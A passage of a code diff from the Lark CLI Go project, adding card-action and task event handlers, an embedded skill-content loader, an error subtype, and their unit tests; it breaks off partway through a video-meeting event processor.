// unavailable identity must not be told to "auth login" (which is blocked).
func TestWhoami_ExternalProvider_UserReady(t *testing.T) {
cfg := &core.CliConfig{
ProfileName: "p", AppID: "cli_x", Brand: core.BrandFeishu,
SupportedIdentities: uint8(extcred.SupportsAll), UserOpenId: "ou_x", UserName: "Alice",
}
f, out := externalWhoamiFactory(cfg)
cmd := NewCmdWhoami(f)
cmd.SetArgs([]string{"--as", "user", "--json"})
if err := cmd.Execute(); err != nil {
t.Fatalf("Execute() error = %v", err)
}
var got whoamiResult
if err := json.Unmarshal(out.Bytes(), &got); err != nil {
t.Fatalf("Unmarshal: %v\n%s", err, out.String())
}
if got.Identity != "user" || !got.Available || got.TokenStatus != "ready" {
t.Fatalf("got %#v, want user/available/ready", got)
}
if got.OnBehalfOf == nil || got.OnBehalfOf.UserName != "Alice" || got.OnBehalfOf.OpenID != "ou_x" {
t.Fatalf("onBehalfOf = %#v, want Alice/ou_x (delegated)", got.OnBehalfOf)
}
if got.Hint != "" {
t.Fatalf("hint = %q, want empty when available", got.Hint)
}
}
func TestWhoami_ExternalProvider_UserHintNotKeychain(t *testing.T) {
cfg := &core.CliConfig{
ProfileName: "p", AppID: "cli_x", Brand: core.BrandFeishu,
SupportedIdentities: uint8(extcred.SupportsUser), // user supported but not signed in
}
f, out := externalWhoamiFactory(cfg)
cmd := NewCmdWhoami(f)
cmd.SetArgs([]string{"--as", "user", "--json"})
if err := cmd.Execute(); err != nil {
t.Fatalf("Execute() error = %v", err)
}
var got whoamiResult
if err := json.Unmarshal(out.Bytes(), &got); err != nil {
t.Fatalf("Unmarshal: %v\n%s", err, out.String())
}
if got.Identity != "user" || got.Available {
t.Fatalf("got identity=%q available=%v, want user/false", got.Identity, got.Available)
}
if strings.Contains(got.Hint, "auth login") {
t.Fatalf("hint must not point at auth login under external provider: %q", got.Hint)
}
if !strings.Contains(got.Hint, "external") {
t.Fatalf("hint should explain external management: %q", got.Hint)
}
}

41
content_embed.go Normal file
View File

@@ -0,0 +1,41 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package main
import (
"embed"
"fmt"
"io/fs"
"os"
"github.com/larksuite/cli/cmd"
"github.com/larksuite/cli/internal/affordance"
)
// embeddedContentFS bundles the agent-readable content that must ship in lockstep
// with the binary: each skill's docs (SKILL.md + references/, plus whiteboard's
// routes/ and scenes/) and the per-domain affordance guidance (affordance/*.md).
// Machine-resource skill dirs (assets/, scripts/) are excluded. It's a whitelist —
// a new content type is omitted until added to the embed list. The embed must live
// in this root package because go:embed cannot reach up out of a package's dir.
//
//go:embed skills/*/SKILL.md skills/*/references skills/*/routes skills/*/scenes affordance/*.md
var embeddedContentFS embed.FS
// init wires the embedded content into the CLI. It compiles into `go build .` but
// not the single-file preview build (`go build ./main.go`), so that build stays
// self-contained (shipping no embedded content). Assembly failures warn on stderr
// rather than panicking — embedded content is nice-to-have, not load-bearing.
func init() {
if sub, err := fs.Sub(embeddedContentFS, "skills"); err != nil {
fmt.Fprintln(os.Stderr, "warning: skills embed assembly failed, skills commands disabled:", err)
} else {
cmd.SetEmbeddedSkillContent(sub)
}
if sub, err := fs.Sub(embeddedContentFS, "affordance"); err != nil {
fmt.Fprintln(os.Stderr, "warning: affordance embed assembly failed, command guidance disabled:", err)
} else {
affordance.SetSource(sub)
}
}

View File

@@ -12,8 +12,9 @@ const (
// CategoryValidation subtypes
const (
SubtypeInvalidArgument Subtype = "invalid_argument" // user-supplied flag / arg failed validation (gRPC INVALID_ARGUMENT alignment)
SubtypeFailedPrecondition Subtype = "failed_precondition" // request is valid but the system/resource state is not in the state required to execute; caller must change state (not retry) — e.g. ambiguous remote mapping (gRPC FAILED_PRECONDITION alignment)
SubtypeInvalidArgument Subtype = "invalid_argument" // user-supplied flag / arg failed validation (gRPC INVALID_ARGUMENT alignment)
SubtypeFailedPrecondition Subtype = "failed_precondition" // request is valid but the system/resource state is not in the state required to execute; caller must change state (not retry) — e.g. ambiguous remote mapping (gRPC FAILED_PRECONDITION alignment)
SubtypeUnsupportedCapability Subtype = "unsupported_capability" // the addressed provider/agent does not support the requested capability (agent card / Discoverer gating); exit 2, no request is sent
)
// CategoryAuthentication subtypes

132
events/im/card_action.go Normal file
View File

@@ -0,0 +1,132 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package im
import (
"context"
"encoding/json"
"strings"
"github.com/larksuite/cli/internal/event"
)
// CardActionTriggerOutput is the flattened shape for card.action.trigger.
type CardActionTriggerOutput struct {
Type string `json:"type" desc:"Event type; always card.action.trigger"`
EventID string `json:"event_id,omitempty" desc:"Globally unique event ID"`
Timestamp string `json:"timestamp,omitempty" desc:"Event delivery time (ms timestamp string)" kind:"timestamp_ms"`
OperatorID string `json:"operator_id,omitempty" desc:"Operator open_id" kind:"open_id"`
MessageID string `json:"message_id,omitempty" desc:"Message ID of the card" kind:"message_id"`
ChatID string `json:"chat_id,omitempty" desc:"Chat ID" kind:"chat_id"`
Host string `json:"host,omitempty" desc:"Host type: im_message / im_top_notice"`
Token string `json:"token,omitempty" desc:"Token for delay card update (valid 30 min, max 2 updates)"`
ActionTag string `json:"action_tag,omitempty" desc:"Triggered element type: button/select_static/input/checker/etc"`
ActionValue string `json:"action_value,omitempty" desc:"Developer-defined action value as JSON string"`
ActionName string `json:"action_name,omitempty" desc:"Element name attribute"`
FormValue string `json:"form_value,omitempty" desc:"Form submission values as JSON string (only on form submit)"`
InputValue string `json:"input_value,omitempty" desc:"Input field value (only for input elements)"`
Option string `json:"option,omitempty" desc:"Selected option value (for single-select dropdown)"`
Options string `json:"options,omitempty" desc:"Selected options, comma-separated (for multi-select)"`
Checked bool `json:"checked" desc:"Checkbox state (for checkbox elements)"`
Timezone string `json:"timezone,omitempty" desc:"User timezone for date/time picker interactions"`
CardContent string `json:"card_content,omitempty" desc:"Original card JSON content (body.content) auto-fetched via message get API at consume time using message_id; empty if message_id absent or fetch fails"`
}
func processCardAction(ctx context.Context, rt event.APIClient, raw *event.RawEvent, _ map[string]string) (json.RawMessage, error) {
var envelope struct {
Header struct {
EventID string `json:"event_id"`
EventType string `json:"event_type"`
CreateTime string `json:"create_time"`
} `json:"header"`
Event struct {
Operator struct {
OpenID string `json:"open_id"`
} `json:"operator"`
Token string `json:"token"`
Host string `json:"host"`
Action struct {
Tag string `json:"tag"`
Value map[string]interface{} `json:"value"`
Name string `json:"name"`
FormValue map[string]interface{} `json:"form_value"`
InputValue string `json:"input_value"`
Option string `json:"option"`
Options []string `json:"options"`
Checked bool `json:"checked"`
Timezone string `json:"timezone"`
} `json:"action"`
Context struct {
OpenMessageID string `json:"open_message_id"`
OpenChatID string `json:"open_chat_id"`
} `json:"context"`
} `json:"event"`
}
if err := json.Unmarshal(raw.Payload, &envelope); err != nil {
return raw.Payload, nil //nolint:nilerr // passthrough on malformed payload
}
actionValue := marshalToString(envelope.Event.Action.Value)
formValue := marshalToString(envelope.Event.Action.FormValue)
options := strings.Join(envelope.Event.Action.Options, ",")
out := &CardActionTriggerOutput{
Type: envelope.Header.EventType,
EventID: envelope.Header.EventID,
Timestamp: envelope.Header.CreateTime,
OperatorID: envelope.Event.Operator.OpenID,
MessageID: envelope.Event.Context.OpenMessageID,
ChatID: envelope.Event.Context.OpenChatID,
Host: envelope.Event.Host,
Token: envelope.Event.Token,
ActionTag: envelope.Event.Action.Tag,
ActionValue: actionValue,
ActionName: envelope.Event.Action.Name,
FormValue: formValue,
InputValue: envelope.Event.Action.InputValue,
Option: envelope.Event.Action.Option,
Options: options,
Checked: envelope.Event.Action.Checked,
Timezone: envelope.Event.Action.Timezone,
}
if out.MessageID != "" && rt != nil {
out.CardContent = fetchCardUserDSL(ctx, rt, out.MessageID)
}
return json.Marshal(out)
}
// fetchCardUserDSL gets the card message content via message get API.
// Returns empty string on any failure — never blocks event consumption.
func fetchCardUserDSL(ctx context.Context, rt event.APIClient, messageID string) string {
path := "/open-apis/im/v1/messages/" + messageID + "?card_msg_content_type=user_card_content"
resp, err := rt.CallAPI(ctx, "GET", path, nil)
if err != nil {
return ""
}
var result struct {
Code int `json:"code"`
Msg string `json:"msg"`
Data struct {
Items []struct {
Body struct {
Content string `json:"content"`
} `json:"body"`
} `json:"items"`
} `json:"data"`
}
if json.Unmarshal(resp, &result) != nil || result.Code != 0 || len(result.Data.Items) == 0 {
return ""
}
return result.Data.Items[0].Body.Content
}
func marshalToString(m map[string]interface{}) string {
if len(m) == 0 {
return ""
}
b, _ := json.Marshal(m)
return string(b)
}

View File

@@ -0,0 +1,432 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package im
import (
"context"
"encoding/json"
"testing"
"time"
"github.com/larksuite/cli/internal/event"
)
func TestCardActionTriggerRegistered(t *testing.T) {
def, ok := event.Lookup("card.action.trigger")
if !ok {
t.Fatal("card.action.trigger should be registered via Keys()")
}
if def.Schema.Custom == nil {
t.Error("card.action.trigger must set Schema.Custom")
}
if def.Process == nil {
t.Error("card.action.trigger must set Process")
}
if len(def.Scopes) == 0 {
t.Error("Scopes must not be empty")
}
}
func TestProcessCardAction_Button(t *testing.T) {
payload := `{
"schema": "2.0",
"header": {
"event_id": "ev_btn_001",
"event_type": "card.action.trigger",
"create_time": "1776409469273"
},
"event": {
"operator": {"open_id": "ou_operator"},
"token": "c-token-btn",
"host": "im_message",
"action": {
"tag": "button",
"value": {"key": "approve"},
"name": "approve_btn",
"form_value": {},
"options": [],
"checked": false
},
"context": {
"open_message_id": "om_msg_001",
"open_chat_id": "oc_chat_001"
}
}
}`
out := runCardAction(t, payload, nil)
if out.Type != "card.action.trigger" {
t.Errorf("Type = %q, want card.action.trigger", out.Type)
}
if out.EventID != "ev_btn_001" {
t.Errorf("EventID = %q", out.EventID)
}
if out.OperatorID != "ou_operator" {
t.Errorf("OperatorID = %q", out.OperatorID)
}
if out.ActionTag != "button" {
t.Errorf("ActionTag = %q, want button", out.ActionTag)
}
if out.ActionValue != `{"key":"approve"}` {
t.Errorf("ActionValue = %q", out.ActionValue)
}
if out.ActionName != "approve_btn" {
t.Errorf("ActionName = %q", out.ActionName)
}
if out.Token != "c-token-btn" {
t.Errorf("Token = %q", out.Token)
}
if out.MessageID != "om_msg_001" {
t.Errorf("MessageID = %q", out.MessageID)
}
if out.ChatID != "oc_chat_001" {
t.Errorf("ChatID = %q", out.ChatID)
}
if out.Host != "im_message" {
t.Errorf("Host = %q", out.Host)
}
if out.Timestamp != "1776409469273" {
t.Errorf("Timestamp = %q", out.Timestamp)
}
}
func TestProcessCardAction_FormSubmit(t *testing.T) {
payload := `{
"schema": "2.0",
"header": {
"event_id": "ev_form_001",
"event_type": "card.action.trigger",
"create_time": "1776409469274"
},
"event": {
"operator": {"open_id": "ou_form_user"},
"token": "c-token-form",
"host": "im_message",
"action": {
"tag": "button",
"value": {},
"name": "submit_btn",
"form_value": {"name": "test-user", "reason": "testing"},
"options": [],
"checked": false
},
"context": {
"open_message_id": "om_form_001",
"open_chat_id": "oc_chat_002"
}
}
}`
out := runCardAction(t, payload, nil)
if out.FormValue != `{"name":"test-user","reason":"testing"}` {
t.Errorf("FormValue = %q", out.FormValue)
}
if out.ActionTag != "button" {
t.Errorf("ActionTag = %q, want button", out.ActionTag)
}
}
func TestProcessCardAction_MultiSelect(t *testing.T) {
payload := `{
"schema": "2.0",
"header": {
"event_id": "ev_ms_001",
"event_type": "card.action.trigger",
"create_time": "1776409469275"
},
"event": {
"operator": {"open_id": "ou_ms_user"},
"token": "c-token-ms",
"host": "im_message",
"action": {
"tag": "multi_select_static",
"value": {},
"name": "multi_select",
"options": ["opt_1", "opt_3"],
"checked": false
},
"context": {
"open_message_id": "om_ms_001",
"open_chat_id": "oc_chat_003"
}
}
}`
out := runCardAction(t, payload, nil)
if out.Options != "opt_1,opt_3" {
t.Errorf("Options = %q, want opt_1,opt_3", out.Options)
}
if out.ActionTag != "multi_select_static" {
t.Errorf("ActionTag = %q", out.ActionTag)
}
}
func TestProcessCardAction_Input(t *testing.T) {
payload := `{
"schema": "2.0",
"header": {
"event_id": "ev_input_001",
"event_type": "card.action.trigger",
"create_time": "1776409469276"
},
"event": {
"operator": {"open_id": "ou_input_user"},
"token": "c-token-input",
"host": "im_message",
"action": {
"tag": "input",
"value": {},
"name": "text_input",
"input_value": "hello world",
"options": [],
"checked": false
},
"context": {
"open_message_id": "om_input_001",
"open_chat_id": "oc_chat_004"
}
}
}`
out := runCardAction(t, payload, nil)
if out.InputValue != "hello world" {
t.Errorf("InputValue = %q", out.InputValue)
}
if out.ActionTag != "input" {
t.Errorf("ActionTag = %q", out.ActionTag)
}
}
func TestProcessCardAction_DatePicker(t *testing.T) {
payload := `{
"schema": "2.0",
"header": {
"event_id": "ev_date_001",
"event_type": "card.action.trigger",
"create_time": "1776409469277"
},
"event": {
"operator": {"open_id": "ou_date_user"},
"token": "c-token-date",
"host": "im_message",
"action": {
"tag": "date_picker",
"value": {},
"name": "date_selector",
"option": "2024-04-01 +0800",
"timezone": "Asia/Shanghai",
"options": [],
"checked": false
},
"context": {
"open_message_id": "om_date_001",
"open_chat_id": "oc_chat_005"
}
}
}`
out := runCardAction(t, payload, nil)
if out.Option != "2024-04-01 +0800" {
t.Errorf("Option = %q", out.Option)
}
if out.Timezone != "Asia/Shanghai" {
t.Errorf("Timezone = %q", out.Timezone)
}
}
func TestProcessCardAction_MalformedPayload(t *testing.T) {
raw := &event.RawEvent{
EventID: "ev_bad",
EventType: "card.action.trigger",
Payload: json.RawMessage(`not json`),
Timestamp: time.Now(),
}
got, err := processCardAction(context.Background(), nil, raw, nil)
if err != nil {
t.Fatalf("Process should swallow parse errors, got %v", err)
}
if string(got) != "not json" {
t.Errorf("malformed fallback output = %q, want original bytes", string(got))
}
}
func TestProcessCardAction_MessageGetSuccess(t *testing.T) {
payload := `{
"schema": "2.0",
"header": {
"event_id": "ev_mg_ok",
"event_type": "card.action.trigger",
"create_time": "1776409469278"
},
"event": {
"operator": {"open_id": "ou_mg_user"},
"token": "c-token-mg",
"host": "im_message",
"action": {
"tag": "button",
"value": {"key": "click"},
"name": "btn",
"form_value": {},
"options": [],
"checked": false
},
"context": {
"open_message_id": "om_mg_001",
"open_chat_id": "oc_chat_mg"
}
}
}`
cardContent := `{"header":{"title":{"tag":"plain_text","content":"A card"}}}`
mock := &mockAPIClient{resp: `{
"code": 0,
"msg": "success",
"data": {
"items": [{
"body": {"content": "` + escapeJSON(cardContent) + `"}
}]
}
}`}
out := runCardAction(t, payload, mock)
if out.CardContent == "" {
t.Error("CardContent should not be empty when message get succeeds")
}
}
func TestProcessCardAction_MessageGetErrorCode(t *testing.T) {
payload := `{
"schema": "2.0",
"header": {
"event_id": "ev_mg_ec",
"event_type": "card.action.trigger",
"create_time": "1776409469279"
},
"event": {
"operator": {"open_id": "ou_mg_user2"},
"token": "c-token-mg2",
"host": "im_message",
"action": {
"tag": "button",
"value": {},
"name": "btn",
"form_value": {},
"options": [],
"checked": false
},
"context": {
"open_message_id": "om_mg_002",
"open_chat_id": "oc_chat_mg2"
}
}
}`
mock := &mockAPIClient{resp: `{"code": 1, "msg": "error", "data": {"items": []}}`}
out := runCardAction(t, payload, mock)
if out.CardContent != "" {
t.Errorf("CardContent should be empty when code != 0, got %q", out.CardContent)
}
}
func TestProcessCardAction_MessageGetFailure(t *testing.T) {
payload := `{
"schema": "2.0",
"header": {
"event_id": "ev_mg_fail",
"event_type": "card.action.trigger",
"create_time": "1776409469280"
},
"event": {
"operator": {"open_id": "ou_mg_user3"},
"token": "c-token-mg3",
"host": "im_message",
"action": {
"tag": "button",
"value": {},
"name": "btn",
"form_value": {},
"options": [],
"checked": false
},
"context": {
"open_message_id": "om_mg_003",
"open_chat_id": "oc_chat_mg3"
}
}
}`
mock := &mockAPIClient{errResp: true}
out := runCardAction(t, payload, mock)
if out.CardContent != "" {
t.Errorf("CardContent should be empty when message get fails, got %q", out.CardContent)
}
}
func TestProcessCardAction_EmptyMessageID(t *testing.T) {
payload := `{
"schema": "2.0",
"header": {
"event_id": "ev_no_msg",
"event_type": "card.action.trigger",
"create_time": "1776409469281"
},
"event": {
"operator": {"open_id": "ou_no_msg"},
"token": "c-token-nm",
"host": "im_message",
"action": {
"tag": "button",
"value": {},
"name": "btn",
"form_value": {},
"options": [],
"checked": false
},
"context": {
"open_message_id": "",
"open_chat_id": "oc_chat_nm"
}
}
}`
out := runCardAction(t, payload, nil)
if out.CardContent != "" {
t.Errorf("CardContent should be empty when message_id is absent, got %q", out.CardContent)
}
}
type mockAPIClient struct {
resp string
errResp bool
}
func (m *mockAPIClient) CallAPI(_ context.Context, _, _ string, _ interface{}) (json.RawMessage, error) {
if m.errResp {
return nil, context.DeadlineExceeded
}
return json.RawMessage(m.resp), nil
}
func runCardAction(t *testing.T, payload string, rt event.APIClient) CardActionTriggerOutput {
t.Helper()
raw := &event.RawEvent{
EventID: "ev_test",
EventType: "card.action.trigger",
Payload: json.RawMessage(payload),
Timestamp: time.Now(),
}
got, err := processCardAction(context.Background(), rt, raw, nil)
if err != nil {
t.Fatalf("Process error: %v", err)
}
var out CardActionTriggerOutput
if err := json.Unmarshal(got, &out); err != nil {
t.Fatalf("Process output is not valid CardActionTriggerOutput JSON: %v\nraw=%s", err, string(got))
}
return out
}
func escapeJSON(s string) string {
b, _ := json.Marshal(s)
return string(b[1 : len(b)-1])
}

View File

@@ -27,6 +27,21 @@ func Keys() []event.KeyDefinition {
AuthTypes: []string{"bot"},
RequiredConsoleEvents: []string{"im.message.receive_v1"},
},
{
Key: "card.action.trigger",
DisplayName: "Card action",
Description: "Triggered when a user interacts with an interactive card (button click, form submit, dropdown select, etc.). Output includes: token (valid 30 min, max 2 updates), action details (tag, value, name, form_value), and card_content (original card in userDSL text format, auto-fetched at consume time). To update the card: parse card_content to understand the current state, construct the new card JSON, then call `lark-cli api POST /open-apis/interactive/v1/card/update` with the token (see lark-im-card-action-reply.md).",
EventType: "card.action.trigger",
SubscriptionType: event.SubTypeCallback,
Schema: event.SchemaDef{
Custom: &event.SchemaSpec{Type: reflect.TypeOf(CardActionTriggerOutput{})},
},
Process: processCardAction,
Scopes: []string{"im:message:readonly"},
AuthTypes: []string{"bot"},
SingleConsumer: true,
RequiredConsoleEvents: []string{"card.action.trigger"},
},
}
for _, rk := range nativeIMKeys {

View File

@@ -7,6 +7,7 @@ package events
import (
"github.com/larksuite/cli/events/im"
"github.com/larksuite/cli/events/minutes"
"github.com/larksuite/cli/events/task"
"github.com/larksuite/cli/events/vc"
"github.com/larksuite/cli/events/whiteboard"
"github.com/larksuite/cli/internal/event"
@@ -17,6 +18,7 @@ func init() {
all := [][]event.KeyDefinition{
im.Keys(),
minutes.Keys(),
task.Keys(),
vc.Keys(),
whiteboard.Keys(),
}

23
events/task/native.go Normal file
View File

@@ -0,0 +1,23 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package task
// TaskUpdateUserAccessV2Data is the Task v2 update event payload under the
// standard Lark V2 event envelope.
type TaskUpdateUserAccessV2Data struct {
EventTypes []string `json:"event_types,omitempty" desc:"Task commit types included in this event" enum:"task_create,task_deleted,task_summary_update,task_desc_update,task_assignees_update,task_followers_update,task_reminders_update,task_start_due_update,task_completed_update"`
TaskGUID string `json:"task_guid,omitempty" desc:"Task GUID that changed" kind:"task_guid"`
}
var taskUpdateUserAccessCommitTypes = []string{
"task_create",
"task_deleted",
"task_summary_update",
"task_desc_update",
"task_assignees_update",
"task_followers_update",
"task_reminders_update",
"task_start_due_update",
"task_completed_update",
}

32
events/task/preconsume.go Normal file
View File

@@ -0,0 +1,32 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package task
import (
"context"
"github.com/larksuite/cli/errs"
"github.com/larksuite/cli/internal/event"
)
const taskSubscriptionPath = "/open-apis/task/v2/task_v2/task_subscription?user_id_type=open_id"
func taskSubscriptionPreConsume(ctx context.Context, rt event.APIClient, _ map[string]string) (func() error, error) {
if rt == nil {
return nil, errs.NewInternalError(errs.SubtypeUnknown,
"runtime API client is required for pre-consume subscription")
}
if _, err := rt.CallAPI(ctx, "POST", taskSubscriptionPath, nil); err != nil {
if _, ok := errs.ProblemOf(err); ok {
return nil, err
}
return nil, errs.NewNetworkError(
errs.SubtypeNetworkTransport,
"failed to subscribe task event",
).WithCause(err)
}
return nil, nil
}

View File

@@ -0,0 +1,119 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package task
import (
"context"
"encoding/json"
"errors"
"testing"
"github.com/larksuite/cli/errs"
)
type stubAPIClient struct {
err error
method string
path string
body interface{}
calls int
}
func (s *stubAPIClient) CallAPI(_ context.Context, method, path string, body interface{}) (json.RawMessage, error) {
s.method = method
s.path = path
s.body = body
s.calls++
if s.err != nil {
return nil, s.err
}
return json.RawMessage(`{"code":0,"msg":"success","data":{}}`), nil
}
func TestTaskSubscriptionPreConsumeCallsSubscribeAPI(t *testing.T) {
rt := &stubAPIClient{}
cleanup, err := taskSubscriptionPreConsume(context.Background(), rt, nil)
if err != nil {
t.Fatalf("taskSubscriptionPreConsume error = %v", err)
}
if cleanup != nil {
t.Fatal("cleanup = non-nil, want nil because task subscription has no unsubscribe API")
}
if rt.calls != 1 {
t.Fatalf("calls = %d, want 1", rt.calls)
}
if rt.method != "POST" {
t.Errorf("method = %q, want POST", rt.method)
}
if rt.path != taskSubscriptionPath {
t.Errorf("path = %q, want %q", rt.path, taskSubscriptionPath)
}
if rt.body != nil {
t.Errorf("body = %#v, want nil", rt.body)
}
}
func TestTaskSubscriptionPreConsumeRequiresRuntime(t *testing.T) {
_, err := taskSubscriptionPreConsume(context.Background(), nil, nil)
if err == nil {
t.Fatal("expected error")
}
p, ok := errs.ProblemOf(err)
if !ok {
t.Fatalf("expected typed error, got %T: %v", err, err)
}
if p.Category != errs.CategoryInternal {
t.Errorf("category = %s, want %s", p.Category, errs.CategoryInternal)
}
if p.Subtype != errs.SubtypeUnknown {
t.Errorf("subtype = %s, want %s", p.Subtype, errs.SubtypeUnknown)
}
}
func TestTaskSubscriptionPreConsumePassesThroughAPIError(t *testing.T) {
wantErr := errs.NewValidationError(errs.SubtypeFailedPrecondition, "subscription already exists")
rt := &stubAPIClient{err: wantErr}
_, err := taskSubscriptionPreConsume(context.Background(), rt, nil)
if err != wantErr {
t.Fatalf("err identity changed: got %T %v, want original %T %v", err, err, wantErr, wantErr)
}
if !errors.Is(err, wantErr) {
t.Fatalf("err = %v, want %v", err, wantErr)
}
p, ok := errs.ProblemOf(err)
if !ok {
t.Fatalf("expected typed error, got %T: %v", err, err)
}
if p.Category != errs.CategoryValidation {
t.Errorf("category = %s, want %s", p.Category, errs.CategoryValidation)
}
if p.Subtype != errs.SubtypeFailedPrecondition {
t.Errorf("subtype = %s, want %s", p.Subtype, errs.SubtypeFailedPrecondition)
}
}
func TestTaskSubscriptionPreConsumeWrapsUntypedAPIError(t *testing.T) {
cause := errors.New("connection reset")
rt := &stubAPIClient{err: cause}
_, err := taskSubscriptionPreConsume(context.Background(), rt, nil)
if err == nil {
t.Fatal("expected error")
}
if !errors.Is(err, cause) {
t.Fatalf("err = %v, want cause %v", err, cause)
}
p, ok := errs.ProblemOf(err)
if !ok {
t.Fatalf("expected typed error, got %T: %v", err, err)
}
if p.Category != errs.CategoryNetwork {
t.Errorf("category = %s, want %s", p.Category, errs.CategoryNetwork)
}
if p.Subtype != errs.SubtypeNetworkTransport {
t.Errorf("subtype = %s, want %s", p.Subtype, errs.SubtypeNetworkTransport)
}
}

33
events/task/register.go Normal file
View File

@@ -0,0 +1,33 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
// Package task registers Task-domain EventKeys.
package task
import (
"reflect"
"github.com/larksuite/cli/internal/event"
)
const eventTypeTaskUpdateUserAccessV2 = "task.task.update_user_access_v2"
// Keys returns all Task-domain EventKey definitions.
func Keys() []event.KeyDefinition {
return []event.KeyDefinition{
{
Key: eventTypeTaskUpdateUserAccessV2,
DisplayName: "Task updated",
Description: "Triggered when tasks visible to the current user or app are created, deleted, or updated",
EventType: eventTypeTaskUpdateUserAccessV2,
Schema: event.SchemaDef{
Native: &event.SchemaSpec{Type: reflect.TypeOf(TaskUpdateUserAccessV2Data{})},
},
PreConsume: taskSubscriptionPreConsume,
Scopes: []string{"task:task:read"},
AuthTypes: []string{"user", "bot"},
RequiredConsoleEvents: []string{eventTypeTaskUpdateUserAccessV2},
SingleConsumer: true,
},
}
}

View File

@@ -0,0 +1,95 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package task
import (
"encoding/json"
"reflect"
"testing"
"github.com/larksuite/cli/internal/event"
"github.com/larksuite/cli/internal/event/schemas"
)
func TestKeysTaskUpdateUserAccessMetadata(t *testing.T) {
keys := Keys()
if len(keys) != 1 {
t.Fatalf("len(Keys()) = %d, want 1", len(keys))
}
def := keys[0]
if def.Key != eventTypeTaskUpdateUserAccessV2 {
t.Errorf("Key = %q, want %q", def.Key, eventTypeTaskUpdateUserAccessV2)
}
if def.EventType != eventTypeTaskUpdateUserAccessV2 {
t.Errorf("EventType = %q, want %q", def.EventType, eventTypeTaskUpdateUserAccessV2)
}
if def.Schema.Native == nil {
t.Fatal("Schema.Native is nil")
}
if def.Schema.Native.Type != reflect.TypeOf(TaskUpdateUserAccessV2Data{}) {
t.Errorf("native type = %v, want TaskUpdateUserAccessV2Data", def.Schema.Native.Type)
}
if def.Process != nil {
t.Fatal("Native Task EventKey must not set Process")
}
if def.PreConsume == nil {
t.Fatal("PreConsume is nil")
}
if !def.SingleConsumer {
t.Fatal("SingleConsumer = false, want true")
}
if !reflect.DeepEqual(def.Scopes, []string{"task:task:read"}) {
t.Errorf("Scopes = %#v", def.Scopes)
}
if !reflect.DeepEqual(def.AuthTypes, []string{"user", "bot"}) {
t.Errorf("AuthTypes = %#v", def.AuthTypes)
}
if !reflect.DeepEqual(def.RequiredConsoleEvents, []string{eventTypeTaskUpdateUserAccessV2}) {
t.Errorf("RequiredConsoleEvents = %#v", def.RequiredConsoleEvents)
}
}
func TestTaskUpdateUserAccessSchemaAnnotations(t *testing.T) {
raw := schemas.WrapV2Envelope(schemas.FromType(reflect.TypeOf(TaskUpdateUserAccessV2Data{})))
var schema map[string]interface{}
if err := json.Unmarshal(raw, &schema); err != nil {
t.Fatalf("unmarshal schema: %v", err)
}
eventProps := schema["properties"].(map[string]interface{})["event"].(map[string]interface{})["properties"].(map[string]interface{})
taskGUID := eventProps["task_guid"].(map[string]interface{})
if got := taskGUID["format"]; got != "task_guid" {
t.Errorf("task_guid format = %v, want task_guid", got)
}
eventTypes := eventProps["event_types"].(map[string]interface{})
items := eventTypes["items"].(map[string]interface{})
rawEnum, ok := items["enum"].([]interface{})
if !ok {
t.Fatalf("event_types item enum missing: %#v", items["enum"])
}
got := make(map[string]bool, len(rawEnum))
for _, v := range rawEnum {
got[v.(string)] = true
}
for _, want := range taskUpdateUserAccessCommitTypes {
if !got[want] {
t.Errorf("event_types enum missing %q; enum=%v", want, rawEnum)
}
}
}
func TestTaskUpdateUserAccessRegistersCleanly(t *testing.T) {
const key = eventTypeTaskUpdateUserAccessV2
event.UnregisterKeyForTest(key)
t.Cleanup(func() { event.UnregisterKeyForTest(key) })
for _, def := range Keys() {
event.RegisterKey(def)
}
if _, ok := event.Lookup(key); !ok {
t.Fatalf("event.Lookup(%q) not registered", key)
}
}

View File

@@ -0,0 +1,62 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package vc
import (
"context"
"encoding/json"
"github.com/larksuite/cli/internal/event"
)
// VCParticipantMeetingJoinedOutput is the flattened shape for vc.meeting.participant_meeting_joined_v1.
type VCParticipantMeetingJoinedOutput struct {
Type string `json:"type" desc:"Event type; always vc.meeting.participant_meeting_joined_v1"`
EventID string `json:"event_id,omitempty" desc:"Globally unique event ID; safe for deduplication"`
Timestamp string `json:"timestamp,omitempty" desc:"Event delivery time (ms timestamp string); taken from header.create_time when present" kind:"timestamp_ms"`
MeetingID string `json:"meeting_id,omitempty" desc:"Meeting ID" kind:"meeting_id"`
Topic string `json:"topic,omitempty" desc:"Meeting topic"`
MeetingNo string `json:"meeting_no,omitempty" desc:"Meeting number"`
StartTime string `json:"start_time,omitempty" desc:"Meeting start time in RFC3339, converted to the local timezone"`
CalendarEventID string `json:"calendar_event_id,omitempty" desc:"Calendar event ID associated with the meeting"`
}
func processVCParticipantMeetingJoined(_ context.Context, _ event.APIClient, raw *event.RawEvent, _ map[string]string) (json.RawMessage, error) {
var envelope struct {
Header struct {
EventID string `json:"event_id"`
EventType string `json:"event_type"`
CreateTime string `json:"create_time"`
} `json:"header"`
Event struct {
Meeting struct {
ID string `json:"id"`
Topic string `json:"topic"`
MeetingNo string `json:"meeting_no"`
StartTime string `json:"start_time"`
EndTime string `json:"end_time"`
CalendarEventID string `json:"calendar_event_id"`
} `json:"meeting"`
} `json:"event"`
}
if err := json.Unmarshal(raw.Payload, &envelope); err != nil {
return raw.Payload, nil //nolint:nilerr // passthrough on malformed payload so consumers still see the event
}
meeting := envelope.Event.Meeting
out := &VCParticipantMeetingJoinedOutput{
Type: envelope.Header.EventType,
EventID: envelope.Header.EventID,
Timestamp: envelope.Header.CreateTime,
MeetingID: meeting.ID,
Topic: meeting.Topic,
MeetingNo: meeting.MeetingNo,
StartTime: unixSecondsToLocalRFC3339(meeting.StartTime),
CalendarEventID: meeting.CalendarEventID,
}
if out.Type == "" {
out.Type = raw.EventType
}
